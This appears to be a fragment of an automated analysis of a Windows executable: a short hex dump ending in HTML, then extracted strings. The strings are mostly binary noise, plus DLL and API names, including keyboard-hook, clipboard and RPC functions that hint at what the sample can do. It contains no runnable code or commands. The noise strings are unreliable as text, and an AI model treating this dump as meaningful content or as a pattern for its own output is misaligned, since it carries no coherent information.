0x00000120 (00288)   0a0a2020 20203c69 6d672073 72633d22   ..    <img src="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a73650d 0a0d0a0d 0a202073 31767947   .se......  s1vyG
0x00000160 (00352)   67424533 59344167 4b65590a            gBE3Y4AgKeY.


Strings
.
.
d
D
.}
.

040904b0
1113
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2"d2	+Xw
2ieXjB/
2MeYt?n
3"=G&}
<4	5V6
&47>~>
5/{(ju*
5`u}se
/-]60F
?6^5]$
=67H^y
6'@h~l
6]Y		B
8;1l%7
9dS#n	
AnimatePalette
BRWqs	o
CallNextHookEx
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
c_Mi6Q
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiberEx
CreateFontIndirectA
CreateILockBytesOnHGlobal
CreatePen
CreateStreamOnHGlobal
C>rMT)f5pB
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
dN&N8z
DrawEdge
~eHg@N
EmptyClipboard
EnumResourceNamesW
ExtCreatePen
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlattenPath
FlushFileBuffers
fR1V#(
f'>[XT>k_
G9<o8x
g+cWBF
GDI32.dll
GetBitmapBits
GetBkColor
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetPath
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
G>yB|qED	U
^+HLmX
hXx`5_
~IHsp	
@'I`i2a
|II|)v{e
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
I/w}6tL
J|6~#`
JRichu
KERNEL32.dll
	kkV\-
{kLxJ?
L_ItKM
ll/:i{
LocalAlloc
LockFile
m`HER=
MonitorFromWindow
m)u\zH
n3AE)2
~n8.v$
NdrClientCall
nk&hn+
$n`{[Q,
nq?Wls-
o-6@onv
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
]oZm:c
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
p`e<*Tu[
PlgBlt
PolyBezier
ProgIDFromCLSID
pYkQjn
*(>Q$|/
*QI?:S
qM(OC+D
Qp][{'z
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
RoundRect
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetCommConfig
SetDIBits
SetEndOfFile
SetScrollRange
SetStretchBltMode
SetTextColor
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
StrokePath
!This program cannot be run in DOS mode.
tI58h3
$tJNhU
ToAscii
t}o.M`
tOW~i 
Uh2hT2
U	{iB4
UnhookWindowsHookEx
UnlockFile
USER32.dll
u&[U",.
vc	O7N
VerLanguageNameW
v|LtM#
WinHelpW
<w>?lE
w RD]_bb
w=;w)f
:Xq\B{eh
Y-8O9$
?Yk/z~
y_vv A
?Z<Y#_